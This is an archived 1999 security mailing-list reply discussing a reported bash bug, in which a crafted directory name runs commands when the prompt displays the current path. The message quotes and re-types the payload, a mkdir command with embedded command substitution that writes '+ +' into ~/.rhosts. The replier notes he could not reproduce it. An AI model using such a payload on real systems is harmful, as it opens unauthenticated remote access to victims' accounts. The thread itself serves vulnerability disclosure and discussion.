Re: Bash Bug

From: Marc Lehmann (pcgat_private)
Date: Wed Apr 21 1999 - 18:18:48 PDT

Next message: Pavel Kankovsky: "Re: truncate("x", -1)"

Previous message: Adam Herscher: "Re: AOL Instant Messenger URL Crash"
Maybe in reply to: Shadow: "Bash Bug"
Next in thread: Guy Cohen: "Re: Bash Bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
>
> If a user creates a directory with a command like
>
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

It seems to me that this is related to the prompt string parsing. If yes,
then bash is not vulnerable unless configured to display the current
directory (correct me if the root of the problem is different).

Some additional notes:

- I was unable to reproduce this on my system, even when bash is configured
  to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:
  mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"
- PS1 was set to \h:\w\$

HTH

--
      -----==-                                             |
      ----==-- _                                           |
      ---==---(_)__  __ ____  __       Marc Lehmann      +--
      --==---/ / _ \/ // /\ \/ /       pcgat_private      |e|
      -=====/_/_//_/\_,_/ /_/\_\       XX11-RIPE         --+
    The choice of a GNU generation                       |
                                                         |

Next message: Pavel Kankovsky: "Re: truncate("x", -1)"
Previous message: Adam Herscher: "Re: AOL Instant Messenger URL Crash"
Maybe in reply to: Shadow: "Bash Bug"
Next in thread: Guy Cohen: "Re: Bash Bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:30 PDT